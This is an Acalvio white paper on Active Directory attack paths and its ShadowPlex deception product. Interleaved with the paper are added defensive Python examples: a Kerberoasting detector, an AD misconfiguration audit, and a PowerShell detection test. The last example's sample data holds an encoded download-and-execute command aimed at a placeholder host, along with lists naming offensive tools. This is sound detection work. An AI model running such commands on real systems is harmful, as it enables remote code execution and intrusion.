
ACTIVE DIRECTORY THREAT LANDSCAPE AND SHADOWPLEX AD PROTECTION [INTERNAL USE]

Active Directory: The Modern Attack Focal Point


Active Directory (AD) is at the core of the enterprise infrastructure for many organizations and holds valuable, critical information about user identities, network assets, applications, services, policies, and authentication and authorization data. However, given the legacy architecture principles that AD was built upon decades ago, completely securing this crown jewel amid today’s diverse technology and infrastructure complexity has been a challenge for most organizations. This challenge only compounds against the rapid and sophisticated evolution of the threat landscape. While security posture and strategy have taken center stage at most organizations today, the solutions mostly involve increasing audit logging, disabling privileges to run tools, vulnerability scanning, or installing security agents on endpoints and other critical assets. While these solutions are necessary, they provide only a limited defense against advanced threats to assets such as Active Directory. In many cases, installing multiple agents can also increase the attack surface, which does not help tighten the security strategy.

When the first version of Active Directory was released two decades ago, it was built on the philosophy of inherent trust models within the boundaries of a network. Fast forward 20 years – the ever-expanding enterprise boundaries, the need to support a mobile workforce, rapid digital transformation, fast-paced cloud adoption, and the IoT and connected Industrial Control Systems infrastructures have all led to unprecedented complexity for security management. This means an explosion in attack surfaces that are well exploited by adversaries using very sophisticated and advanced attack methods.

Security practices and maturity vary significantly from small and medium businesses to large enterprises. The varied network complexity and enterprise boundary definitions pose a different and unique challenge for every organization. However, what is consistently reported by leading industry threat analysts is that the central identity directory service, the Active Directory deployment, is perhaps the most vulnerable aspect of the entire infrastructure. Active Directory has over 95% of the market share among the Fortune 500 organizations. Attacks against AD can have far-reaching consequences for every organization across multiple industries.

The Active Directory vulnerability vectors are not limited to software defects, its separation from the network periphery, or isolation and firewall configurations. Most attacks against Active Directory stem from the way it is configured in any organization. Active Directory stores multiple types of objects, each with hundreds and thousands of properties for access, authentication, authorization, and transactional rules. Protecting the AD and reducing the attack surface comes down to intimately understanding the object configurations and how these rules can be misused by threat actors. This is not just a security responsibility but implies rewriting the rules of how IT management is carried out in every organization. This can perhaps explain why Active Directory protection is complex, involved, and takes continuous monitoring and course correction in policy definitions to minimize the attack surface.

Copyright © 2021 Acalvio Technologies. All Rights Reserved. This document may have been furnished under license for use only within the terms of that license or
NDA. Written and designed at Acalvio Technologies, 2520 Mission College Boulevard, Suite 110, Santa Clara, CA 95054, USA.

For many enterprises, the current solutions for AD Protection in the market are only as strong as the solution that protects
the endpoints in the enterprise. Unfortunately, of late, it has become rather trivial to target and compromise an enterprise
endpoint using various attack methods such as phishing, spear-phishing, malware, or ransomware infection. When an
endpoint in the enterprise is compromised, attackers perform a local privilege escalation and run a complete reconnaissance
against the enterprise AD and assess the lay of the land. With powerful tools such as Mimikatz, Metasploit, BloodHound,
DeathStar, and Rubeus among many others that are accessible to the attackers, the dwell time for the threat to compromise
the domain controller is significantly minimized. In multiple instances, attackers successfully carry out attacks such as
Kerberoasting and AS-REP Roasting, even without special permissions on the domain to escalate privileges to get to the
domain controller. Even measures such as hardening endpoints and disabling AD Recon can do very little to stop the attack
progression. In certain APT techniques (APT15, also known as K3chang), attackers have been able to run patched copies of
CLI or PowerShell to bypass policies to progress the attack.

As an example, a classic attack path can involve endpoint compromise – using domain credentials to enumerate SPNs –
Kerberoast, AS-REP roasting or Pass-the-Hash attack to obtain service account access – exploit unconstrained delegation to
obtain access to an account for lateral movement – employ stealthy techniques to coerce the Domain Controller to
authenticate the compromised service credential – extract the Domain Controller’s TGT out of memory – impersonate the
Domain Controller account – Complete DC compromise. In most cases, such a compromise comes to light after the damage
has been caused, mainly because the monitoring and defense systems largely rely on authentication and activity log
monitoring.
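The attack path above starts with service-ticket and pre-authentication abuse that the Domain Controller does log (events 4769 and 4768), which is exactly where a defender can detect it before the later stages. The following is an added example, not code from the paper or from Acalvio: two detection heuristics run over constructed Windows Security event records. Field names follow the 4769/4768 event schema; the sample events, the 5-minute window and the 3-service threshold are assumptions chosen for the example.

```python
"""
Added example (not from the paper or from Acalvio): detection heuristics for two
steps of the attack path described above, Kerberoasting and AS-REP Roasting,
run over constructed Windows Security event records. Field names follow the
Windows 4769 (service ticket request) and 4768 (TGT request) event schema; the
sample events, the 5-minute window and the 3-service threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC, the cipher Kerberoast tooling requests
NO_PREAUTH = "0"    # PreAuthType 0 in a 4768 event = TGT issued without pre-authentication

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.21"},
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.21"},
    # machine account: random password, not a roasting target, so it is not counted
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.21"},
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:01:15", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.21"},
    # normal activity: one RC4 ticket for a single legacy service is not enough to alert
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:03:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.7.9"},
    # AES (0x12) tickets are what modern clients request; not counted
    {"EventID": 4769, "TimeCreated": "2021-03-01T09:03:05", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "IpAddress": "10.0.7.9"},
    {"EventID": 4768, "TimeCreated": "2021-03-01T09:04:00", "TargetUserName": "legacy_app",
     "PreAuthType": "0", "IpAddress": "10.0.5.21"},
    {"EventID": 4768, "TimeCreated": "2021-03-01T09:04:10", "TargetUserName": "jdoe",
     "PreAuthType": "2", "IpAddress": "10.0.5.21"},
]


def _is_roastable_service(name):
    """Machine accounts ($) and krbtgt have random or managed passwords; skip them."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Flag a requester that pulls RC4 service tickets for many distinct
    service accounts inside one short window (bulk SPN harvesting)."""
    per_user = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769
                and e.get("TicketEncryptionType", "").lower() == RC4_HMAC
                and _is_roastable_service(e["ServiceName"])):
            per_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"], e["IpAddress"]))
    alerts = []
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):                      # sliding time window
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc, _ in reqs[start:end + 1]}
            if len(services) >= min_services:
                alerts.append({"rule": "kerberoasting", "user": user,
                               "source_ip": reqs[end][2], "services": sorted(services)})
                break                                     # one alert per user is enough
    return alerts


def detect_asrep_roasting(events):
    """Flag TGTs issued without pre-authentication: the account has
    DONT_REQ_PREAUTH set and its AS-REP can be cracked offline."""
    return [{"rule": "asrep_roasting", "user": e["TargetUserName"], "source_ip": e["IpAddress"]}
            for e in events if e["EventID"] == 4768 and e.get("PreAuthType") == NO_PREAUTH]


def run_detections(events):
    return detect_kerberoasting(events) + detect_asrep_roasting(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Both rules key on what the attacker cannot avoid asking the KDC for (an RC4 ticket per SPN, a TGT without pre-authentication) rather than on the tool that asks, so renaming Rubeus or Invoke-Kerberoast does not change the result. The encryption-type check assumes service accounts have been moved to AES keys; in a domain still issuing RC4 everywhere the threshold, not the cipher, carries the signal.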

The type of attacks in the news that weaponize Active Directory to compromise, propagate, or bring down the entire
operational ability reiterates the reach of damage AD compromise can cause. Some of the key attack types that exploit or
use AD as a conduit include:

➢ Advanced Persistent Threats (APTs): It is well established that APTs target Active Directory for the benefits they
can reap with one core compromise. As an example, APT15, also known as K3chang or Playful Dragon, a cyber-
espionage group employs a custom tool called Comma Separated Value Data Exchange (CSVDE) that can export the
entire Active Directory data out. Also, once the AD is compromised, they can get to high-value assets such as MS
SQL Database and export the entire DB data using another tool called Bulk Copy Program (BCP), resulting in a total
compromise of the enterprise data. This attack was carried out against a global company that provides services to
the UK Government in 2018 that led to a widespread leak of military information.

➢ Ransomware Propagation through Active Directory: The modern ransomware campaigns utilize tools like
Mimikatz, BloodHound, and PowerSploit for the AD environment recon, and then to steal credentials, move deeper
into the network, and establish persistence. A rather infamous ransomware strain called LockerGoga routinely taps
into Active Directory to use the AD management service to distribute the ransomware payloads to the thousands of
endpoints managed by the AD. Similarly, another strain of ransomware called SaveTheQueen propagates its
malware payload by modifying the GPO on the SYSVOL share on the Domain Controller. Similarly, Ryuk and Maze
have compromised Active Directory to propagate the infection across the network.

➢ Attacks on Industrial Control Systems: With the increased digitization of Industrial Control Systems, the attacks against these critical infrastructure systems have also exploded. These enterprises use Active Directory for their IT segment and, even though best practices recommend physical isolation and hard firewall-based segmentation between the IT and OT networks, there are often instances where these recommendations are violated and Active Directory is installed on the OT network segment. This could be for any number of reasons – from the ease of user management to ensuring common credentials across IT and production floor systems. Examples suggest that the AD DCs between the IT and OT network segments are configured for automatic synchronization, creating a massive attack and penetration surface. The breach at Norsk Hydro, the world’s largest aluminum producer, is a clear example of how the Active Directory was compromised by the APT-style ransomware LockerGoga to distribute the malware payload across their IT and OT segments. In a similar style, attacks against crucial oil and gas infrastructures indicate that the Active Directory compromise was carried out using insecure RDP access and placing TrickBot in the Windows logon script.

This raises the question – what constitutes a compelling AD Protection solution?

While many may consider complete AD protection somewhat of a moving target, it is clear that traditional audit-logging and monitoring solutions alone are insufficient. In addition to solutions that protect the endpoints such as EDR or EPP, SIEM/SOAR alerting systems, adhering to hardening and least-privilege protocols, and building restoration and resiliency plans for the AD infrastructure, a good protection solution for AD in any enterprise would be to adopt an Active Defense strategy. The best AD protection strategy is the one that prevents an attack on the enterprise’s core infrastructure as much as possible by providing continuous visibility into possible attack surfaces, predicting the attacker’s path, slowing down, confusing or diverting the attacker, predicting and detecting the TTPs at every stage, and ultimately even changing the attacker’s perception of the network.

This paper covers some of the most prevalent attack vectors on AD, some of the stealthy attack paths and exploits that most
often evade existing detection systems, and how Acalvio ShadowPlex - an Advanced Deception Platform, can provide a
comprehensive and compelling solution for AD Protection for any enterprise.

Active Directory Administration: Attack Surface and Attack Paths


The security awareness at many organizations has seen a linear growth in maturity, and the security and IT teams may have many best practices and employee training on the internal security awareness campaigns. These practices definitely benefit from clearing out easy entry points into the network and from closing the low-hanging IT administrative attack surfaces. IT policies that enforce complex passwords, restricted inbound traffic, blacklisting PowerShell, CLI and other applications, strict group policies, and tightened ACEs and ACLs are the most common things that may be enforced. While these are much needed and helpful, with the ever-changing nature of the enterprise network, attack surface exposure also changes dynamically and very frequently. Common business occurrences such as an expanding network, adding on new geo-locations, remote or branch office networks, onboarding partners and contractors, supporting R&D labs, M&A integration activities, introducing new software and applications, cloud adoption and expansion, linking cloud services to AD - all contribute to a very dynamically changing attack surface landscape in the enterprise. Even for the most security-forward class of enterprises, balancing the visibility into the network frailty and supporting the business’ IT needs is a massive challenge. This only re-emphasizes that organizations that are yet to reach security maturity or are still in the process of full digital transformation face a very steep challenge and are extremely vulnerable to nasty, devastating attacks.

Attack surfaces that may open up exploit paths to compromise the Active
Directory can stem from multiple vectors, but can be broadly summarized
into the following categories as discussed in the following sections.

Windows System and Active Directory Vulnerabilities


Over the lengthy lifespan of Windows Server and Active Directory, there have been innumerable CVEs scoring from low to critically high on the CVSS scale. The most recent AD vulnerability (CVE-2020-1472) scored a 10/10 on the CVSS scale. This vulnerability, called the “ZeroLogon Vulnerability”, allows an attacker to compromise the entire domain without even requiring a valid domain credential. It stems from a critical flaw in the cryptographic protocol that establishes the identity of a domain-joined system. The vulnerability is so severe that attackers can spoof the identity of any system on the domain, including the Domain Controller, simply reset the password, and compromise the enterprise within minutes. This is just the latest vulnerability, and the list of CVEs is by no means short. Microsoft regularly releases security patches, and security analysts are all on top of these vulnerabilities for disclosures, testing, and fix validations. The issue, however, is that for all enterprises, rolling out patches and ensuring the AD infrastructure is always on the latest and greatest release version is non-trivial. The time window between the announcement of the vulnerability and patching is the ripe golden opportunity for attackers. While the defense teams stay on top of plugging these vulnerabilities, the appearance of attack surfaces from other vectors, like misconfigurations leaving holes in the wall, may be overlooked. This ties back into missed visibility and lost time in threat awareness, confirmation, and investigation. When it comes to core infrastructure, patching is necessary but, more often than not, simply insufficient.

Active Directory Misconfigurations


One of the most powerful capabilities of Active Directory is its flexible configurability for enforcing varied types of policies, but unfortunately, this is also one of its biggest security drawbacks. User provisioning, computer/server management, group management, ACLs, ACEs, GPOs, and attribute population for multiple object types are all managed using countless scripts. As a standard practice, IT teams rely heavily on native methods for administration such as PowerShell for on-premises and Azure AD deployments. While such administration scripts facilitate extreme flexibility, they create a very high level of management complexity in the environment. As the complexity grows, it causes multiple unknown dependencies and security misconfigurations. Such misconfigurations can create security holes and unintentionally open unforeseen attack paths.

Unfortunately, what’s worse is that these misconfigurations are hard to find and fix. Each of them can lead to an undesired exposure and, in most cases, they come to light only after a malicious event has occurred because of the misconfiguration. When it comes to securing the enterprise and a proactive security posture, "learning the hard way” is too expensive an approach to adopt. The accompanying infographic depicts a few misconfigurations that not only punch holes in the wall, but leave the door wide open for attackers to simply make their way in.
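Since the text says these misconfigurations are hard to find, the practical first step is to enumerate them from the attributes AD already exposes. The following is an added example, not the paper's or Acalvio's code, and not the infographic's list: an audit over user and computer objects that flags the configuration errors behind the attack steps this paper names (AS-REP Roasting, Kerberoasting, unconstrained delegation). The userAccountControl bit values are the documented Microsoft ones; the object records, the privileged-group list and the password-age threshold are constructed assumptions. In production the records would come from an LDAP query rather than a literal list.

```python
"""
Added example (not from the paper or from Acalvio): an audit over AD user and
computer objects that flags the misconfigurations behind AS-REP Roasting,
Kerberoasting and unconstrained delegation. userAccountControl bit values are
the documented Microsoft ones; SAMPLE_OBJECTS, PRIVILEGED_GROUPS and
MAX_SERVICE_PASSWORD_AGE_DAYS are constructed assumptions for this example.
"""
from datetime import date

# userAccountControl flags (documented values)
UF_PASSWD_NOTREQD         = 0x0020
UF_NORMAL_ACCOUNT         = 0x0200
UF_WORKSTATION_TRUST      = 0x1000
UF_SERVER_TRUST_ACCOUNT   = 0x2000    # set on domain controllers
UF_DONT_EXPIRE_PASSWD     = 0x10000
UF_TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation
UF_USE_DES_KEY_ONLY       = 0x200000
UF_DONT_REQUIRE_PREAUTH   = 0x400000  # AS-REP roastable

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumption
MAX_SERVICE_PASSWORD_AGE_DAYS = 365                                          # assumption

# Constructed sample objects in the shape an LDAP query would return.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": "2017-06-01", "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "svc_print", "objectClass": "user",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["HTTP/print01.corp.local"],
     "pwdLastSet": "2021-01-10", "memberOf": []},
    {"sAMAccountName": "legacy_app", "objectClass": "user",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "pwdLastSet": "2020-11-03", "memberOf": []},
    {"sAMAccountName": "WEB01$", "objectClass": "computer",
     "userAccountControl": UF_WORKSTATION_TRUST | UF_TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/web01.corp.local"],
     "pwdLastSet": "2021-02-20", "memberOf": []},
    {"sAMAccountName": "DC01$", "objectClass": "computer",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/dc01.corp.local"],
     "pwdLastSet": "2021-02-01", "memberOf": []},
    {"sAMAccountName": "jdoe", "objectClass": "user",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": [], "pwdLastSet": "2021-01-15", "memberOf": []},
]


def audit_object(obj, today):
    """Return (finding, severity) pairs for one directory object."""
    uac = obj["userAccountControl"]
    findings = []
    is_user = obj["objectClass"] == "user"
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)

    if uac & UF_DONT_REQUIRE_PREAUTH:               # AS-REP can be requested and cracked offline
        findings.append(("ASREP_ROASTABLE", "high"))

    if is_user and obj["servicePrincipalName"]:      # any domain user can request its service ticket
        age_days = (today - date.fromisoformat(obj["pwdLastSet"])).days
        stale = age_days > MAX_SERVICE_PASSWORD_AGE_DAYS or bool(uac & UF_DONT_EXPIRE_PASSWD)
        findings.append(("KERBEROASTABLE_SPN", "high" if stale else "medium"))
        if set(obj["memberOf"]) & PRIVILEGED_GROUPS: # cracked hash == tier-0 access
            findings.append(("PRIVILEGED_SPN_ACCOUNT", "critical"))

    if uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:  # DCs legitimately carry this flag
        findings.append(("UNCONSTRAINED_DELEGATION", "high"))

    if uac & UF_PASSWD_NOTREQD:
        findings.append(("PASSWORD_NOT_REQUIRED", "high"))
    if uac & UF_USE_DES_KEY_ONLY:
        findings.append(("DES_ONLY_KEYS", "medium"))
    return findings


def audit_directory(objects, today=date(2021, 3, 1)):
    """Map each account name to its findings; clean objects are omitted."""
    report = {}
    for obj in objects:
        findings = audit_object(obj, today)
        if findings:
            report[obj["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit_directory(SAMPLE_OBJECTS).items():
        print(account, findings)
```

The severity logic reflects the attack path in the paper: a Kerberoastable SPN becomes a critical finding only when the service account also sits in a privileged group, because cracking that one hash is then a complete domain compromise, and unconstrained delegation is flagged on every host except domain controllers, where the flag is expected.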

Hybrid AD Network Security Challenge


Almost every organization today has a Hybrid IT network. Cloud adoption has been on a significant rise and this in turn has resulted in expanded security boundaries. With the uptake in adoption of Microsoft365®, Azure Active Directory adoption becomes mandatory. While the Azure platform offers a very high degree of security, a lot of the security onus still lies with the enterprise, ranging from account and access management, identity and directory infrastructure, application configurations, network and OS controls, physical hosts, data centres, and networks, all the way to data governance, data storage and rights management. With the varying needs of organizations, there have been multiple topologies of Hybrid Active Directory deployments. Some of these are: Synchronized on-prem AD-Azure AD, Cloud-only Azure AD, Embedded AD in Azure, or even Federated on-prem AD-Azure AD. Each of these models has its own set of attack surfaces that may become exposed, leading to multiple security blind spots.

Hybrid AD Misconfigurations (source: Microsoft Docs):

➢ Excessive privileges on cloud resources
➢ Custom subscription owner roles
➢ Guest access
➢ Disabled storage service encryption
➢ Not encrypting data-in-transit
➢ Long-living Shared Access Signatures
➢ Improper use of Network Security Groups
➢ Unmonitored resources
➢ Unsupervised change orchestration
➢ Password Writeback enabled
➢ Insecure Azure AD Connect server

Protecting a hybrid AD environment still faces the same AD security challenges, but on a different landscape, against blurring lines of control. Deployment choices such as Azure AD Connect, optional password hash sync, Azure AD Pass-through Authentication, and Azure AD Domain Services all need heightened vigilance and extremely close monitoring to keep attack surfaces and unforeseen attack paths in check. In deployments that use Azure AD Connect, sophisticated attackers may gain access to the AD Connect server that synchronizes on-prem AD with Azure AD and obtain access to user accounts. Pass-through Authentication can even be exploited, using what is called a Skeleton Key, to escalate privileges to Global Admin for the Azure tenant. This can lead to a land-and-expand attack stemming from on-premises and reaching Azure, spelling a devastating breach.

The Democratization of Red Team Tools


Over the last few years, the cybersecurity community has made tremendous advancements in authoring Red Team tools and making them available as open source. While this has lent tremendous benefits to the defense teams, attackers have adopted these powerful tools as well. BloodHound, PowerSploit, Metasploit, Mimikatz, Hashcat, Rubeus, ADRecon, Kekeo, DeathStar, PowerView, and many others are openly available to anyone and everyone. BloodHound, for instance, can find the shortest path within the network for privilege escalation and lateral movement. This extremely powerful tool can very easily discover relationships between various entities in the domain and calculate the shortest attack path and traversal using the object links. While the defense teams at some organizations effectively use these for their Red-Blue team activities, many organizations may not have reached that level of security maturity or may not conduct these activities frequently enough to find the security gaps and proactively fix them.

Contrasting this with attackers’ fast-paced adoption of these powerful tools, the attackers always seem to be ahead in the game. In addition to these open source tools, attackers often use Living-off-the-Land (LotL) techniques to fully utilize powerful tools such as Windows PowerShell that are already available in the environment. This helps them evade detection easily, even in environments that have alerting mechanisms set up against the use of such powerful tools on endpoints. Simply renaming a PowerShell script or modifying the offensive code to a certain degree can throw the detection system off balance. Also, in the absence of automated responses for such events, the manual investigation, triage and response lifecycle simply loses the time-criticality battle.
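The renaming problem described above is a property of the rule, not of the tool: a rule keyed on a script's file name has nothing to match once the file is renamed, whereas a rule keyed on what the script contains (PowerShell Script Block Logging, event 4104) or on a decoded -EncodedCommand (process creation, event 4688) survives it. The following is an added example, not code from the paper or from Acalvio, that runs both kinds of rule over constructed records. The record shape, the indicator lists and the sample command lines are assumptions for the example; the cmdlet names in the indicator list are those of the open-source tooling this paper names.

```python
"""
Added example (not from the paper or from Acalvio): a file-name rule versus a
content rule for offensive PowerShell. SAMPLE_RECORDS, the indicator lists and
the record shape are constructed for this example.
"""
import base64
import re

# Rule A: file-name based. Defeated by renaming the script.
FILENAME_RULE = re.compile(r"(invoke-mimikatz|powerview|invoke-kerberoast)\.ps1", re.I)

# Rule B: content based. Cmdlet names from the open-source tooling named in this
# paper (PowerSploit/PowerView, Kerberoast cmdlets, BloodHound collectors) plus
# generic download-and-execute primitives.
TOOL_INDICATORS = ("invoke-mimikatz", "invoke-kerberoast", "get-netuser",
                   "get-domainuser", "find-localadminaccess", "invoke-bloodhound")
PRIMITIVE_INDICATORS = ("downloadstring", "invoke-expression", "frombase64string",
                        "reflection.assembly", "virtualalloc")


def normalize_script(text):
    """Fold case, drop backtick escapes used to split cmdlet names, collapse whitespace."""
    text = text.replace("`", "")
    return re.sub(r"\s+", " ", text).lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of a -EncodedCommand argument (PowerShell accepts
    any unique prefix: -e, -ec, -enc, ...), or None if the command line has none."""
    for m in re.finditer(r"-e[a-z]*\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # e.g. "-ExecutionPolicy Bypass" is not base64; keep looking
    return None


def analyze(record):
    """Apply both rules to one record and report which indicators fired."""
    result = {"filename_hit": False, "content_hits": []}
    body = ""
    if record["event"] == 4688:
        cmd = record["command_line"]
        result["filename_hit"] = bool(FILENAME_RULE.search(cmd))
        body = decode_encoded_command(cmd) or ""   # 4688 carries no script body otherwise
    elif record["event"] == 4104:
        body = record["script_block"]
    norm = normalize_script(body)
    result["content_hits"] = [i for i in TOOL_INDICATORS + PRIMITIVE_INDICATORS if i in norm]
    return result


def triage(records):
    """Names of the records that either rule would have flagged."""
    flagged = []
    for r in records:
        res = analyze(r)
        if res["filename_hit"] or res["content_hits"]:
            flagged.append(r["name"])
    return flagged


# Constructed sample records.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_RECORDS = [
    # Renamed copy of an offensive script: the file-name rule has nothing to match,
    # and a 4688 event carries no script content, so this record alone stays silent.
    {"name": "renamed-script", "event": 4688,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\temp\km.ps1"},
    # The same script's body as captured by Script Block Logging: backticks split
    # the cmdlet name, but normalization reassembles it.
    {"name": "script-block", "event": 4104,
     "script_block": "function Invoke-Kerb`eroast {\n  param($Identity)\n}\n"
                     "Invoke-Ker`beroast -OutputFormat Hashcat"},
    # Encoded command line: decode first, then match on the decoded text.
    {"name": "encoded-cmd", "event": 4688,
     "command_line": "powershell.exe -NoP -w hidden -enc " + _ENCODED},
    # Routine administration: neither rule fires.
    {"name": "benign", "event": 4104,
     "script_block": "Get-ADUser -Filter * -SearchBase 'OU=Staff,DC=corp,DC=local' | Export-Csv staff.csv"},
]

if __name__ == "__main__":
    for r in SAMPLE_RECORDS:
        print(r["name"], analyze(r))
```

The first record is the important one: with only process-creation telemetry, a renamed script is invisible to both rules, which is why Script Block Logging (or an EDR that sees script content) is a prerequisite for content-based detection, and why the paper's point about renaming holds against file-name rules but not against content rules.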

The illustration below shows a sample attack path concept using open source and in-built tools that can lead to a complete
domain compromise.

Digitization of ICS Environments


Industry 4.0 and Industrial Internet of Things (IIoT) or any other terminology such as Digital Twins all indicate one common
thing – the complete digital transformation of the Industrial sector. With this transformation, there is hyper-connectivity to
the Operational Technology (OT) segments of the industry. This in turn implies that more and more people are granted
remote access to systems that were previously air-gapped, isolated, and managed from dedicated HMI and HIST terminals.
Many industries still use management devices and equipment that may be based on legacy technologies and are far away
from modern secure computing systems. The transformational management solutions now fuse multiple such
interconnected brittle systems and enable process monitoring and maintenance from remote locations.

In general, ICS architectures are based on the 5-level Purdue Model, which layers the Enterprise IT zone, the Production or Manufacturing Zone, and the security zones. However, recently the ICS enterprises have seen attackers pivoting from the IT to the OT segments by compromising IT endpoints, using the same attack paths as in any IT network, escalating privileges, and moving laterally until they find vulnerable ICS interfaces such as remote terminals and HMI systems. Along the way, multiple documented attacks have compromised the Active Directory to enumerate control systems of the OT devices. Some prominent examples are Black Energy (attacking HMIs), Shamoon (attack against Saudi Arabia’s civil aviation sector), APT33 (cyber espionage targeting aviation), NotPetya (Ukraine Power Grid), and Dragonfly (attacking the energy sector), among many others. In summary, digitization of the ICS sector has created a wider attack surface for the enterprises, and the cybersecurity posture must include detection, monitoring, and proactive protection of the ICS segment.

Current Defense and Detection Systems


Most detection and security systems today are based on agent-based behavioral detection, AD event log monitoring, SIEM-based event correlation, SOC triaging, and manual investigation and aftermath threat hunting. While these methods do offer a certain degree of defense capability, securing critical infrastructure components like Active Directory needs a more compelling Active Defense strategy. MITRE Shield is an active defense knowledge base that encourages the use of limited offensive action and counterattacks to deny attack progress. The Shield Matrix lists multiple tactics spanning channel, collect, contain, detect, disrupt, facilitate, legitimize, and test. Using deception techniques across all of these tactics for detection, engagement and counterattack takes center stage in the matrix. This is a compelling framework to build a stronger, proactive AD defense strategy.

Certain deception solutions in the market offer AD protection using non-scalable solutions such as creating complete fake
AD forests, hiding real production assets and domain controllers on parts of the network segment, intercepting DNS lookups,
or deploying a large number of deceptions on enterprise endpoints’ memory. Such solutions cannot offer holistic AD
protection covering multiple bases and are largely static and cannot cover a complex and diverse enterprise network that
comprises a variety of OSes, Azure, or Hybrid AD models.

Acalvio Solution for Active Directory Protection


Acalvio’s ShadowPlex is an autonomous deception platform that provides an AI-based deception solution for Active Directory protection. ShadowPlex’s strong capabilities include deep visibility of the network assets and AD misconfigurations using automatic AD discovery. Advanced AI algorithms provide situational awareness of possible threat vectors lurking on the network and their distance from the critical assets, along with possible attack paths. ShadowPlex combines threat intelligence from various sources using pre-built integrations and builds an attacker’s view of the network that can be invaluable for the defense teams to proactively reduce the attack surface.

ShadowPlex supports on-premises AD deployments, Azure AD and Hybrid AD deployments and provides pre-packaged deception playbooks for AD protection. ShadowPlex’s playbooks incorporate deep knowledge of the threat landscape and TTPs used by sophisticated threats. A rich palette of deceptions enables casting a wider net with automatic key deception placements on the network. ShadowPlex is the only deception solution in the market that offers a wide array of capabilities for Threat Hunting and Investigation based on Advanced Analytics.

Contact Acalvio
Get in touch with Acalvio to schedule a demo of ShadowPlex, or to Try-and-Buy the Deception-based Active Directory
Protection.

About Acalvio:

Acalvio is an inventor of industry-leading advancements in Deception Technology for Advanced Threat Protection. With over 25 issued patents, Acalvio has integrated
Deception technology with advanced AI to provide an autonomous deception solution that is effective, easy to use and can be deployed at enterprise-scale with minimal
overhead. Acalvio ShadowPlex reduces attacker dwell time by early detection of advanced threats and increases SOC efficiency through sophisticated investigation and active
threat-hunting capabilities. Extensive partner integrations allow ShadowPlex to leverage the customer’s ecosystem for rapid and comprehensive threat containment.

Acalvio Technologies| 2520 Mission College Boulevard, Suite 110, Santa Clara, CA 95054, USA | www.acalvio.com
